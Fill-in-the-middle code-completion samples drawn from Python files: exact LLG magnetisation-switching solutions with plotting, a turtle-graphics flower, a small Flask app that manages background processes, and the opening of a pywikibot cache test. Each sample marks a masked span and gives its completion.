timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | generate_dynamics |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def <|fim_middle|>(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | plot_dynamics |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def <|fim_middle|>(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def plot_vs_exact(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | calculate_equivalent_dynamics |
<|file_name|>mallinson.py<|end_file_name|><|fim▁begin|>"""Calculate exact solutions for the zero dimensional LLG as given by
[Mallinson2000]
"""
from __future__ import division
from __future__ import absolute_import
from math import sin, cos, tan, log, atan2, acos, pi, sqrt
import scipy as sp
import matplotlib.pyplot as plt
import functools as ft
import simpleode.core.utils as utils
def calculate_switching_time(magnetic_parameters, p_start, p_now):
"""Calculate the time taken to switch from polar angle p_start to p_now
with the magnetic parameters given.
"""
# Should never quite get to pi/2
# if p_now >= pi/2:
# return sp.inf
# Cache some things to simplify the expressions later
H = magnetic_parameters.H(None)
Hk = magnetic_parameters.Hk()
alpha = magnetic_parameters.alpha
gamma = magnetic_parameters.gamma
# Calculate the various parts of the expression
prefactor = ((alpha**2 + 1)/(gamma * alpha)) \
* (1.0 / (H**2 - Hk**2))
a = H * log(tan(p_now/2) / tan(p_start/2))
b = Hk * log((H - Hk*cos(p_start)) /
(H - Hk*cos(p_now)))
c = Hk * log(sin(p_now) / sin(p_start))
# Put everything together
return prefactor * (a + b + c)
def calculate_azimuthal(magnetic_parameters, p_start, p_now):
"""Calculate the azimuthal angle corresponding to switching from
p_start to p_now with the magnetic parameters given.
"""
def azi_into_range(azi):
a = azi % (2*pi)
if a < 0:
a += 2*pi
return a
alpha = magnetic_parameters.alpha
no_range_azi = (-1/alpha) * log(tan(p_now/2) / tan(p_start/2))
return azi_into_range(no_range_azi)
def generate_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Generate a list of polar angles then return a list of corresponding
m directions (in spherical polar coordinates) and switching times.
"""
mag_params = magnetic_parameters
# Construct a set of solution positions
pols = sp.linspace(start_angle, end_angle, steps)
azis = [calculate_azimuthal(mag_params, start_angle, p) for p in pols]
sphs = [utils.SphPoint(1.0, azi, pol) for azi, pol in zip(azis, pols)]
# Calculate switching times for these positions
times = [calculate_switching_time(mag_params, start_angle, p)
for p in pols]
return (sphs, times)
def plot_dynamics(magnetic_parameters,
start_angle=pi/18,
end_angle=17*pi/18,
steps=1000):
"""Plot exact positions given start/finish angles and magnetic
parameters.
"""
sphs, times = generate_dynamics(magnetic_parameters, start_angle,
end_angle, steps)
sphstitle = "Path of m for " + str(magnetic_parameters) \
+ "\n (starting point is marked)."
utils.plot_sph_points(sphs, title=sphstitle)
timestitle = "Polar angle vs time for " + str(magnetic_parameters)
utils.plot_polar_vs_time(sphs, times, title=timestitle)
plt.show()
def calculate_equivalent_dynamics(magnetic_parameters, polars):
"""Given a list of polar angles (and some magnetic parameters)
calculate what the corresponding azimuthal angles and switching times
(from the first angle) should be.
"""
start_angle = polars[0]
f_times = ft.partial(calculate_switching_time, magnetic_parameters,
start_angle)
exact_times = [f_times(p) for p in polars]
f_azi = ft.partial(calculate_azimuthal, magnetic_parameters, start_angle)
exact_azis = [f_azi(p) for p in polars]
return exact_times, exact_azis
def <|fim_middle|>(magnetic_parameters, ts, ms):
# Extract lists of the polar coordinates
m_as_sph_points = map(utils.array2sph, ms)
pols = [m.pol for m in m_as_sph_points]
azis = [m.azi for m in m_as_sph_points]
# Calculate the corresponding exact dynamics
exact_times, exact_azis = \
calculate_equivalent_dynamics(magnetic_parameters, pols)
# Plot
plt.figure()
plt.plot(ts, pols, '--',
exact_times, pols)
plt.figure()
plt.plot(pols, azis, '--',
pols, exact_azis)
plt.show()
<|fim▁end|> | plot_vs_exact |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def main():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":<|fim▁hole|> main()<|fim▁end|> | |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
<|fim_middle|>
def main():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":
main()
<|fim▁end|> | turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill() |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def main():
<|fim_middle|>
###
if __name__ == "__main__":
main()
<|fim▁end|> | """Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick() |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def main():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":
<|fim_middle|>
<|fim▁end|> | main() |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def <|fim_middle|>(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def main():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":
main()
<|fim▁end|> | bloom |
<|file_name|>bloom.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
import turtle
import random
def bloom(radius):
turtle.colormode(255)
for rad in range(40, 10, -5):
for looper in range(360//rad):
turtle.up()
turtle.circle(radius+rad, rad)
turtle.begin_fill()
turtle.fillcolor((200+random.randint(0, rad),
200+random.randint(0, rad),
200+random.randint(0, rad)))
turtle.down()
turtle.circle(-rad)
turtle.end_fill()
def <|fim_middle|>():
"""Simple flower, using global turtle instance"""
turtle.speed(0)
turtle.colormode(1.0)
bloom(5)
turtle.exitonclick()
###
if __name__ == "__main__":
main()
<|fim▁end|> | main |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
<|fim▁hole|> p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()<|fim▁end|> | @app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc: |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
<|fim_middle|>
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later') |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
<|fim_middle|>
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive()) |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
<|fim_middle|>
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | backProc.terminate()
return 'killed: ' + str(backProc.pid) |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
<|fim_middle|>
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all' |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
<|fim_middle|>
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr) |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
<|fim_middle|>
if __name__ == '__main__':
app.run()
<|fim▁end|> | global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid) |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
<|fim_middle|>
<|fim▁end|> | app.run() |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def <|fim_middle|>():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | testFun |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def <|fim_middle|>():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | root |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def <|fim_middle|>():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | kill |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def <|fim_middle|>():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | kill_all |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def <|fim_middle|>():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def start():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | active |
<|file_name|>test.py<|end_file_name|><|fim▁begin|>
import time
import multiprocessing
from flask import Flask
app = Flask(__name__)
backProc = None
def testFun():
print('Starting')
while True:
time.sleep(3)
print('looping')
time.sleep(3)
print('3 Seconds Later')
@app.route('/')
def root():
return 'Started a background process with PID ' + str(backProc.pid) + " is running: " + str(backProc.is_alive())
@app.route('/kill')
def kill():
backProc.terminate()
return 'killed: ' + str(backProc.pid)
@app.route('/kill_all')
def kill_all():
proc = multiprocessing.active_children()
for p in proc:
p.terminate()
return 'killed all'
@app.route('/active')
def active():
proc = multiprocessing.active_children()
arr = []
for p in proc:
print(p.pid)
arr.append(p.pid)
return str(arr)
@app.route('/start')
def <|fim_middle|>():
global backProc
backProc = multiprocessing.Process(target=testFun, args=(), daemon=True)
backProc.start()
return 'started: ' + str(backProc.pid)
if __name__ == '__main__':
app.run()
<|fim▁end|> | start |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-<|fim▁hole|>#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
"""Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry)
if __name__ == '__main__':
unittest.main()<|fim▁end|> | """API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014 |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
from __future__ import unicode_literals
__version__ = '$Id$'
#
from pywikibot.site import BaseSite
import scripts.maintenance.cache as cache
from tests import _cache_dir
from tests.aspects import unittest, TestCase
class RequestCacheTests(TestCase):
<|fim_middle|>
if __name__ == '__main__':
unittest.main()
<|fim▁end|> | """Validate cache entries."""
net = False
def _check_cache_entry(self, entry):
"""Assert validity of the cache entry."""
self.assertIsInstance(entry.site, BaseSite)
self.assertIsInstance(entry.site._loginstatus, int)
self.assertIsInstance(entry.site._username, list)
if entry.site._loginstatus >= 1:
self.assertIsNotNone(entry.site._username[0])
self.assertIsInstance(entry._params, dict)
self.assertIsNotNone(entry._params)
# TODO: more tests on entry._params, and possibly fixes needed
# to make it closely replicate the original object.
def test_cache(self):
"""Test the apicache by doing _check_cache_entry over each entry."""
cache.process_entries(_cache_dir, self._check_cache_entry) |
<|file_name|>cache_tests.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
"""API Request cache tests."""
#
# (C) Pywikibot team, 2012-2014
#
# Distributed under the terms of the MIT license.
#
